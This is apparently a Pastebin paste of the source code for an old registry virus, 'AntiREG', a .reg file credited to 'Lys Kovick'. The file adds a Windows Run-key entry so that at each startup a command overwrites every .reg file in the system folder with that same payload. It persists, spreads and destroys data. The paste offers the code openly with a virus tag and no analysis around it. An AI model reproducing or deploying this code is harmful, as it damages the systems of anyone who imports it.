Advertisement
FlyFar

Virus.WinREG.Antireg.b (The first REGEDIT virus) - Source Code

Jul 6th, 2023
1,506
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
REG 0.47 KB | Cybersecurity | 0 0
  1. REGEDIT4
  2.  
  3. ;;-------------------------------;;
  4. ;;                               ;;
  5. ;; AntiREG (The First REG Virus) ;;
  6. ;;      Coded By Lys Kovick      ;;
  7. ;;    Special Thanks To Phage    ;;
  8. ;;                               ;;
  9. ;;-------------------------------;;
  10.  
  11. [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
  12. @="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
  13.  
Tags: virus REGEDIT
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement